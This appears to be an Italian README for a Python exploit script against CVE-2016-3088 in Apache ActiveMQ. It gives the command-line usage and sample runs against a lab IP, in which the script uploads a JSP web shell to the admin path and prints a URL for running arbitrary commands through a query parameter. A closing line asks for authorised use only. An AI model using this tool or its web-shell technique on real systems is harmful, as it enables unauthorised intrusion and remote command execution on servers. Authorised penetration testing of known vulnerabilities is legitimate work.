
Uno script di exploit basato su Python per CVE-2016-3088
Uno script di exploit basato su Python per CVE-2016-3088.
Questo è il mio primo script, quindi potrebbe esserci qualcosa che non torna.
Ma sembra funzionare quando l'ho testato.
Questo script elimina la necessità di catturare pacchetti durante la penetrazione di CVE-2016-3088,
così possiamo scrivere e spostare direttamente il file.
python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]
il parametro --script è facoltativo; verrà utilizzato il payload integrato se si esegue il programma senza di esso,
il payload consente solo di eseguire alcuni comandi nell'URL.
Ma puoi inserire altri script per raggiungere il tuo scopo.
Basta scaricare il .py .
E richiede alcuni moduli.
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp
Per favore, usa questo strumento con cautela e solo quando autorizzato!